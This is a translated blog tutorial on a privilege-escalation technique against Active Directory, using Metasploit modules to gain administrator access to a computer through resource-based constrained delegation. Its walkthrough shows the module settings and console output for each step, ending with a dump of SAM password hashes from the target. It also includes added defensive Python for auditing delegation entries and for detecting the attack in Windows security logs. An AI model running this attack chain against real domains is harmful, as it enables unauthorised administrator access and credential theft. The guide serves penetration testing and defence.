This article is a translation; readers who need the original can open it via the "read the original" link.
Metasploit recently released version 6.3. It brings a large batch of new features related to LDAP operations and Kerberos authentication. Here is the announcement from the Metasploit project:

Metasploit Framework 6.3 is now available 🎉.
New features include native Kerberos authentication support, streamlined Active Directory attack workflows (AD CS, AD DS), and new modules for requesting, forging and converting tickets between formats.
- Metasploit Project (@metasploit), January 30, 2023
In this blog post I want to demonstrate how to carry out an RBCD attack using GenericWrite permissions, a configuration I find to be very common. Typically a user has no administrative rights on a computer but does hold GenericWrite or a comparable right (GenericAll, Owns, etc.) over the computer object. By abusing this configuration it is possible to obtain administrative rights on the computer. There are currently two main ways to perform this attack: either with the combination of Rubeus/Powermad/PowerView, or with the various scripts in Impacket.
To explain some of the new functionality, I will compare the Metasploit modules with their Impacket counterparts.
First, to carry out this attack you will need a computer account. If you do not already have one under your control, you will need to create one. In Impacket we would use addcomputer.py, but here we will use auxiliary/admin/dcerpc/samr_computer.
msf6 auxiliary(admin/dcerpc/samr_computer) > show options

Module options (auxiliary/admin/dcerpc/samr_computer):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   COMPUTER_NAME                   no        The computer name
   RHOSTS         172.16.73.6      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT          445              yes       The target port (TCP)
   SMBDomain      n00py.local      no        The Windows domain to use for authentication
   SMBPass        Password1        no        The password for the specified username
   SMBUser        n00py            no        The username to authenticate as

   When ACTION is ADD_COMPUTER:

   Name               Current Setting  Required  Description
   ----               ---------------  --------  -----------
   COMPUTER_PASSWORD                   no        The password for the new computer

Auxiliary action:

   Name          Description
   ----          -----------
   ADD_COMPUTER  Add a computer account

View the full module info with the info, or info -d command.
msf6 auxiliary(admin/dcerpc/samr_computer) > run
Running module against 172.16.73.6
172.16.73.6:445 - Successfully created n00py.local\DESKTOP-MKFA61G6$
172.16.73.6:445 - Password: 7TH6BPcPqXo5OLTIy3XJbwS77d3VPhyj
172.16.73.6:445 - SID: S-1-5-21-3387312503-3460017432-368973690-1135
Auxiliary module execution completed
Once you have a new computer account, we must configure the delegation rights on the victim computer. In Impacket we would use rbcd.py, but here we will use auxiliary/admin/ldap/rbcd.
msf6 auxiliary(admin/ldap/rbcd) > show options

Module options (auxiliary/admin/ldap/rbcd):

   Name           Current Setting    Required  Description
   ----           ---------------    --------  -----------
   DELEGATE_FROM  DESKTOP-MKFA61G6$  no        The delegation source
   DELEGATE_TO    WIN-27M967MQJL4$   yes       The delegation target
   DOMAIN         n00py.local        no        The domain to authenticate to
   PASSWORD       Password1          no        The password to authenticate with
   RHOSTS         172.16.73.6        yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT          389                yes       The target port
   SSL            false              no        Enable SSL on the LDAP connection
   USERNAME       n00py              no        The username to authenticate with

View the full module info with the info, or info -d command.
msf6 auxiliary(admin/ldap/rbcd) > read
[*] Running module against 172.16.73.6
[+] Successfully bound to the LDAP server!
[*] Discovering base DN automatically
[*] 172.16.73.6:389 Getting root DSE
[+] 172.16.73.6:389 Discovered base DN: DC=n00py,DC=local
[*] The msDS-AllowedToActOnBehalfOfOtherIdentity field is empty.
[*] Auxiliary module execution completed
msf6 auxiliary(admin/ldap/rbcd) > write
[*] Running module against 172.16.73.6
[+] Successfully bound to the LDAP server!
[*] Discovering base DN automatically
[*] 172.16.73.6:389 Getting root DSE
[+] 172.16.73.6:389 Discovered base DN: DC=n00py,DC=local
[+] Successfully created the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.
[*] Added account:
[*] S-1-5-21-3387312503-3460017432-368973690-1135 (DESKTOP-MKFA61G6$)
[*] Auxiliary module execution completed
msf6 auxiliary(admin/ldap/rbcd) > read
[*] Running module against 172.16.73.6
[+] Successfully bound to the LDAP server!
[*] Discovering base DN automatically
[*] 172.16.73.6:389 Getting root DSE
[+] 172.16.73.6:389 Discovered base DN: DC=n00py,DC=local
[*] Allowed accounts:
[*] S-1-5-21-3387312503-3460017432-368973690-1135 (DESKTOP-MKFA61G6$)
[*] Auxiliary module execution completed
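The read and write actions above operate on the msDS-AllowedToActOnBehalfOfOtherIdentity attribute, which holds a binary NT security descriptor whose DACL lists the accounts allowed to delegate to the computer. The following Python script is an added example and not code from the original post, from Metasploit or from Impacket: it parses such a self-relative security descriptor and returns the SIDs of its ACCESS_ALLOWED ACEs, which is exactly what an auditor needs in order to find computer objects in the domain that already carry an RBCD entry. The build_rbcd_descriptor helper exists only to produce a constructed fixture; it is modelled on the layout RBCD tooling writes (BUILTIN\Administrators as owner and group, one full-control ACE per delegator, which is an assumption here), and the sample SID is the one shown in the module output above.

```python
import struct

# NT security descriptor constants (MS-DTYP); only what this parser needs.
SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000
ACCESS_ALLOWED_ACE_TYPE = 0x00
ACL_REVISION = 2
# Assumption: full-control mask, as written by RBCD tooling when it adds a delegator.
FULL_CONTROL_MASK = 0x000F01FF
BUILTIN_ADMINISTRATORS = "S-1-5-32-544"


def sid_to_bytes(sid):
    """Encode a textual SID (S-1-<authority>-<sub>-...) into its binary form."""
    parts = sid.split("-")
    if parts[0] != "S" or parts[1] != "1":
        raise ValueError("not a SID: %r" % sid)
    authority = int(parts[2])
    subs = [int(p) for p in parts[3:]]
    return (bytes([1, len(subs)]) + authority.to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))


def bytes_to_sid(buf, offset=0):
    """Decode a binary SID at buf[offset:]; returns (sid_text, consumed_bytes)."""
    revision, count = buf[offset], buf[offset + 1]
    if revision != 1:
        raise ValueError("unsupported SID revision %d" % revision)
    authority = int.from_bytes(buf[offset + 2:offset + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, offset + 8)
    return "S-1-%d-%s" % (authority, "-".join(str(s) for s in subs)), 8 + 4 * count


def build_rbcd_descriptor(delegator_sids):
    """Constructed fixture: a self-relative SD with one ACCESS_ALLOWED ACE per delegator.
    Layout: 20-byte header, owner SID, group SID, DACL (no SACL)."""
    aces = b""
    for sid in delegator_sids:
        sid_bytes = sid_to_bytes(sid)
        ace_size = 8 + len(sid_bytes)  # ACE header (4) + access mask (4) + SID
        aces += struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0, ace_size, FULL_CONTROL_MASK) + sid_bytes
    dacl = struct.pack("<BBHHH", ACL_REVISION, 0, 8 + len(aces), len(delegator_sids), 0) + aces
    owner = sid_to_bytes(BUILTIN_ADMINISTRATORS)
    group = owner
    owner_off = 20
    group_off = owner_off + len(owner)
    dacl_off = group_off + len(group)
    header = struct.pack("<BBHIIII", 1, 0, SE_SELF_RELATIVE | SE_DACL_PRESENT,
                         owner_off, group_off, 0, dacl_off)
    return header + owner + group + dacl


def parse_allowed_sids(blob):
    """Return the SIDs granted by ACCESS_ALLOWED ACEs in the DACL of a self-relative SD.
    An empty attribute value (no RBCD configured) yields an empty list."""
    if not blob:
        return []
    revision, _, control, _, _, _, dacl_off = struct.unpack_from("<BBHIIII", blob, 0)
    if revision != 1:
        raise ValueError("unsupported security descriptor revision %d" % revision)
    if not (control & SE_DACL_PRESENT) or dacl_off == 0:
        return []  # NULL DACL: nobody is listed
    _, _, _, ace_count, _ = struct.unpack_from("<BBHHH", blob, dacl_off)
    pos = dacl_off + 8
    allowed = []
    for _ in range(ace_count):
        ace_type, _, ace_size = struct.unpack_from("<BBH", blob, pos)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            sid, _ = bytes_to_sid(blob, pos + 8)  # SID follows the 4-byte access mask
            allowed.append(sid)
        # Deny and object ACEs carry the SID at a different offset; they are skipped here.
        pos += ace_size
    return allowed


def unexpected_delegators(blob, approved_sids):
    """Audit helper: SIDs present in the attribute that are not on the approved list."""
    approved = set(approved_sids)
    return [s for s in parse_allowed_sids(blob) if s not in approved]


if __name__ == "__main__":
    # Constructed fixture using the machine-account SID shown in the module output above.
    sample = build_rbcd_descriptor(["S-1-5-21-3387312503-3460017432-368973690-1135"])
    print("Allowed to act on behalf of other identity:", parse_allowed_sids(sample))
    print("Not on the approved list:", unexpected_delegators(sample, []))
```

In practice the blob comes from an LDAP search for (msDS-AllowedToActOnBehalfOfOtherIdentity=*) across the computer objects; any SID that is not on a documented allow-list, and in particular one that resolves to a recently created machine account, deserves a closer look, and clearing the attribute removes the delegation.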
Once delegation is configured, we can request a service ticket for any user. In Impacket we would use getST.py, but here we will use auxiliary/admin/kerberos/get_ticket. We want Metasploit to save the final service ticket.
msf6 auxiliary(admin/kerberos/get_ticket) > show options

Module options (auxiliary/admin/kerberos/get_ticket):

   Name           Current Setting                   Required  Description
   ----           ---------------                   --------  -----------
   AES_KEY                                          no        The AES key to use for Kerberos authentication in hex string. Supported keys: 128 or 256 bits
   CERT_FILE                                        no        The PKCS12 (.pfx) certificate file to authenticate with
   CERT_PASSWORD                                    no        The certificate file's password
   DOMAIN         n00py.local                       no        The Fully Qualified Domain Name (FQDN). Ex: mydomain.local
   NTHASH                                           no        The NT hash in hex string. Server must support RC4
   PASSWORD       7TH6BPcPqXo5OLTIy3XJbwS77d3VPhyj  no        The domain user's password
   RHOSTS         172.16.73.6                       yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT          88                                yes       The target port
   Timeout        10                                yes       The TCP timeout to establish Kerberos connection and read data
   USERNAME       DESKTOP-MKFA61G6$                 no        The domain user

   When ACTION is GET_TGS:

   Name         Current Setting                   Required  Description
   ----         ---------------                   --------  -----------
   IMPERSONATE  Administrator                     no        The user on whose behalf a TGS is requested (it will use S4U2Self/S4U2Proxy to request the ticket)
   SPN          CIFS/WIN-27M967MQJL4.n00py.local  no        The Service Principal Name, format is service_name/FQDN. Ex: cifs/dc01.mydomain.local

Auxiliary action:

   Name     Description
   ----     -----------
   GET_TGS  Request a Ticket-Granting-Service (TGS)

View the full module info with the info, or info -d command.
msf6 auxiliary(admin/kerberos/get_ticket) > set verbose true
verbose => true
msf6 auxiliary(admin/kerberos/get_ticket) > run
Running module against 172.16.73.6
172.16.73.6:88 - Received a valid TGT-Response
172.16.73.6:88 - TGT MIT Credential Cache ticket saved to /root/.msf4/loot/20230130152544_default_172.16.73.6_mit.kerberos.cca_994901.bin
172.16.73.6:88 - Getting TGS impersonating Administrator@n00py.local (SPN: CIFS/WIN-27M967MQJL4.n00py.local)
172.16.73.6:88 - Received a valid TGS-Response
172.16.73.6:88 - TGS MIT Credential Cache ticket saved to /root/.msf4/loot/20230130152544_default_172.16.73.6_mit.kerberos.cca_606526.bin
172.16.73.6:88 - Received a valid TGS-Response
172.16.73.6:88 - TGS MIT Credential Cache ticket saved to /root/.msf4/loot/20230130152544_default_172.16.73.6_mit.kerberos.cca_662784.bin
Auxiliary module execution completed
Finally, once we have the ticket we can perform administrative actions against the target. Typically Impacket's secretsdump.py or CrackMapExec would be used to extract hashes from the system. Instead we can use Metasploit's auxiliary/gather/windows_secrets_dump module, which is equivalent to running CrackMapExec with both --sam and --lsa. The only tricky part here is getting it to work with Kerberos authentication, which requires going into the advanced options.
msf6 auxiliary(gather/windows_secrets_dump) > show options

Module options (auxiliary/gather/windows_secrets_dump):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOSTS     172.16.73.12     yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT      445              yes       The target port (TCP)
   SMBDomain  n00py.local      no        The Windows domain to use for authentication
   SMBPass                     no        The password for the specified username
   SMBUser    Administrator    no        The username to authenticate as

Auxiliary action:

   Name  Description
   ----  -----------
   ALL   Dump everything

View the full module info with the info, or info -d command.
msf6 auxiliary(gather/windows_secrets_dump) > show advanced

Module advanced options (auxiliary/gather/windows_secrets_dump):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   [TRUNCATED]
   SMB::Auth  kerberos         yes       The Authentication mechanism to use (Accepted: auto, ntlm, kerberos)
   [TRUNCATED]

   Active when SMB::Auth is kerberos:

   Name                            Current Setting                                                                  Required  Description
   ----                            ---------------                                                                  --------  -----------
   DomainControllerRhost           WIN-NDA9607EHKS.n00py.local                                                      no        The resolvable rhost for the Domain Controller
   KrbCacheMode                    read-write                                                                       yes       Kerberos ticket cache storage mode (Accepted: none, read-only, write-only, read-write)
   SMB::Krb5Ccname                 /root/.msf4/loot/20230130152544_default_172.16.73.6_mit.kerberos.cca_662784.bin  no        The ccache file to use for kerberos authentication
   SMB::KrbOfferedEncryptionTypes  AES256,AES128,RC4-HMAC,DES-CBC-MD5,DES3-CBC-SHA1                                 yes       Kerberos encryption types to offer
   SMB::Rhostname                  WIN-27M967MQJL4.n00py.local                                                      no        The rhostname which is required for kerberos - the SPN

View the full module info with the info, or info -d command.
msf6 auxiliary(gather/windows_secrets_dump) > run
[*] Running module against 172.16.73.12
[*] 172.16.73.12:445 - Opening Service Control Manager
[*] 172.16.73.12:445 - Binding to svcctl...
[+] 172.16.73.12:445 - Bound to svcctl
[*] 172.16.73.12:445 - Service RemoteRegistry is in stopped state
[*] 172.16.73.12:445 - Starting service...
[*] 172.16.73.12:445 - Retrieving target system bootKey
[*] 172.16.73.12:445 - Retrieving class info for SYSTEM\CurrentControlSet\Control\Lsa\JD
[*] 172.16.73.12:445 - Retrieving class info for SYSTEM\CurrentControlSet\Control\Lsa\Skew1
[*] 172.16.73.12:445 - Retrieving class info for SYSTEM\CurrentControlSet\Control\Lsa\GBG
[*] 172.16.73.12:445 - Retrieving class info for SYSTEM\CurrentControlSet\Control\Lsa\Data
[+] 172.16.73.12:445 - bootKey: 0x1a9c42b4c664bb5ab1c699858559fc76
[*] 172.16.73.12:445 - Checking NoLMHash policy
[*] 172.16.73.12:445 - LMHashes are not being stored
[*] 172.16.73.12:445 - Saving remote SAM database
[*] 172.16.73.12:445 - Create SAM key
[*] 172.16.73.12:445 - Save key to PUnE0CMU.tmp
[*] 172.16.73.12:445 - Dumping SAM hashes
[*] 172.16.73.12:445 - Calculating HashedBootKey from SAM
[*] 172.16.73.12:445 - Password hints:
No users with password hints on this system
[*] 172.16.73.12:445 - Password hashes (pwdump format - uid:rid:lmhash:nthash:::):
Administrator:500:aad3b435b51404eeaad3b435b51404ee:b0abb98152c261c4c23429ed9eecc117:::
[TRUNCATED]
[*] Auxiliary module execution completed
That concludes the whole process.
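Seen from the defender's side, the chain walked through above leaves two footprints in the domain controller's Security log: the new machine account (event 4741, "A computer account was created") and the write to msDS-AllowedToActOnBehalfOfOtherIdentity (event 5136, "A directory service object was modified", which is only generated when Directory Service Changes auditing is enabled and the computer objects carry a matching SACL). The following Python is an added example and not part of the original post: it runs a simple correlation over a few constructed log records (the field names are simplified and every value is invented for the illustration, borrowing the account and host names from the walkthrough) and raises an alert for any RBCD write by an account that is not a known provisioning account, escalating the severity when the same account created a machine account shortly beforehand.

```python
from datetime import datetime, timedelta

RBCD_ATTRIBUTE = "msDS-AllowedToActOnBehalfOfOtherIdentity"
EVENT_COMPUTER_CREATED = 4741    # "A computer account was created"
EVENT_DS_OBJECT_MODIFIED = 5136  # "A directory service object was modified"

# Constructed sample records (assumption: the SIEM exposes the Security-log fields under
# these simplified keys). Subjects, names and times are invented for the illustration.
SAMPLE_EVENTS = [
    {"time": "2023-01-30T09:00:00", "id": 5136, "subject": "svc_provisioning",
     "object_dn": "CN=WEB01,CN=Computers,DC=n00py,DC=local", "attribute": RBCD_ATTRIBUTE},
    {"time": "2023-01-30T10:00:00", "id": 5136, "subject": "n00py",
     "object_dn": "CN=WIN-27M967MQJL4,CN=Computers,DC=n00py,DC=local", "attribute": "description"},
    {"time": "2023-01-30T15:20:00", "id": 4741, "subject": "n00py", "target": "DESKTOP-MKFA61G6$"},
    {"time": "2023-01-30T15:23:00", "id": 5136, "subject": "n00py",
     "object_dn": "CN=WIN-27M967MQJL4,CN=Computers,DC=n00py,DC=local", "attribute": RBCD_ATTRIBUTE},
]


def detect_rbcd_abuse(events, trusted_subjects=(), window=timedelta(hours=1)):
    """Flag writes to msDS-AllowedToActOnBehalfOfOtherIdentity by untrusted accounts and
    raise the severity when the same account created a machine account within `window`."""
    trusted = set(trusted_subjects)
    created_by = {}  # subject -> [(timestamp, new computer name), ...]
    alerts = []
    for event in sorted(events, key=lambda e: e["time"]):  # ISO-8601 strings sort chronologically
        ts = datetime.fromisoformat(event["time"])
        if event["id"] == EVENT_COMPUTER_CREATED:
            created_by.setdefault(event["subject"], []).append((ts, event["target"]))
            continue
        if event["id"] != EVENT_DS_OBJECT_MODIFIED or event.get("attribute") != RBCD_ATTRIBUTE:
            continue
        if event["subject"] in trusted:
            continue  # approved provisioning flow: log it, do not alert
        reasons = ["%s written by non-provisioning account" % RBCD_ATTRIBUTE]
        recent = [name for (t, name) in created_by.get(event["subject"], [])
                  if ts - window <= t <= ts]
        if recent:
            reasons.append("same account created machine account(s) %s within the last %s"
                           % (", ".join(recent), window))
        alerts.append({"time": event["time"], "subject": event["subject"],
                       "object_dn": event["object_dn"], "reasons": reasons,
                       "severity": "high" if recent else "medium"})
    return alerts


if __name__ == "__main__":
    for alert in detect_rbcd_abuse(SAMPLE_EVENTS, trusted_subjects={"svc_provisioning"}):
        print(alert["severity"].upper(), alert["time"], alert["subject"], alert["object_dn"])
        for reason in alert["reasons"]:
            print("   -", reason)
```

The trusted-subject list is the important tuning knob: RBCD is a legitimate feature used by provisioning tooling, so the signal is not the attribute write itself but who performs it. Setting the ms-DS-MachineAccountQuota to 0, or restricting who may create computer objects, removes the first step of the chain for ordinary users and makes the remaining 5136 events far rarer and easier to review.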
Originally published on the WeChat public account 鸿鹄实验室: [Translation] Performing RBCD attacks with MSF